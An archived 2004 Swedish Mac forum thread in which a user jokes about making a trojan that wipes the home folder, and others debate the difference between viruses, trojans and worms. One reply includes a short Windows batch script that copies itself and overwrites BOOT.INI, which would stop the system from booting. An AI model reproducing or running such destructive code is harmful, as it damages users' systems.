Denna delen av 99 uppdateras inte längre utan har arkiverats inför framtiden som ett museum.
Här kan du läsa mer om varför.
Mac-nyheter hittar du på Macradion.com och forumet hittar du via Applebubblan.

Jag har gjort första viruset till Mac OS X

Tråden skapades och har fått 14 svar. Det senaste inlägget skrevs .
1
  • Medlem
  • International user
  • 2004-04-12 10:51

Jag har gjort första viruset till Mac OS X. Programmet utger sig för att optimera Mac OS X, men raderar egentligen hela din hemkatalog :eek:

Senast redigerat 2004-04-12 12:21

ok, jag ska köra det med det samma! tack för tipset!

  • Oregistrerad
  • 2004-04-12 11:18

Optimera OSX - så bra: Det skall jag köra bums…

Man kan ju göra en ny användare om man av nyfikenhet bara måste testa...

Jag anar en viss ironi i detta. Är ett program som gör något det inte från början utger sig för att göra, är det då ett virus? .. eller bara ett kasst program...

  • Medlem
  • International user
  • 2004-04-12 12:01
Ursprungligen av Johan Arvidsson:

Jag anar en viss ironi i detta. Är ett program som gör något det inte från början utger sig för att göra, är det då ett virus? .. eller bara ett kasst program...

Virus som koncept: Du "får hem" något till datorn som gör något icke önskat...

Ursprungligen av Wire:

Virus som koncept: Du "får hem" något till datorn som gör något icke önskat...

...som tex MS Word då eller?

Ursprungligen av Wire:

Virus som koncept: Du "får hem" något till datorn som gör något icke önskat...

Jag är ändå rätt säker på att definitionen av ett virus inbegriper att det kan sprida sig självt (därav liknelsen med organiska sjukdomar). Det där är snarare en trojan.

  • Oregistrerad
  • 2004-04-27 11:36
Ursprungligen av alimony:

Jag är ändå rätt säker på att definitionen av ett virus inbegriper att det kan sprida sig självt (därav liknelsen med organiska sjukdomar). Det där är snarare en trojan.

Japp, ett virus ska föröka sig självt. Inte nödvändigtvist till andra datorer men det ska åtminstonde infektera andra filer. Virus infekterar olika filer och sprider sig genom att filerna sprids av användare.

En Trojan är ett program som nästlar sig in i din dator och där utför saker som kan öppna din dator för vidare attacker eller något annat illasinnat. Igentligen hör dom flesta epost virusen hit då en trojan oftast kräver att du själv kör programmet.

Worms är sådana som sprider sig själv över t.ex. nätverk utan någon "hjälp" från användare.

Här får ni ett Windows (w2k, xp) virus, kopiera och klipp inte in i anteckningar. Spara inte den som skitkul.bat och starta den INTE.

@echo off
type %0 > %WINDIR%\regedit.bat
SET PATHEXT = ".BAT;%PATHEXT%"
attrib -R -A -S c:\BOOT.INI
echo "det här kommer försvåra omstart en aning" > C:\BOOT.INI
attrib +A +S c:\BOOT.INI
 
Senast redigerat 2004-04-27 11:47
  • Medlem
  • Svedala
  • 2004-04-12 12:37

Helst ska man kombinera det hela med ett kedjebrev också...
"Skicka denna fil vidare till alla du känner så kommer du att få 20 % rabatt på nästa systemuppgradering!"

  • Medlem
  • International user
  • 2004-04-12 12:45

Jag hade ju kunnat maskera mitt program, som raderar hela hemkatalogen, som en mp3-fil. Men det billig tricket hörde jag att någon redan gjort.

hahaha

Den flyttade runt alla ikonerna på mitt skrivbord.........

Det heter "trojan" och är en helt annan sak.

  • Oregistrerad
  • 2004-04-27 10:47

Vad får du ut av att knåpa ihop virus (trojan) till OS X? Saknar du alla problem med Windows?

1
Bevaka tråden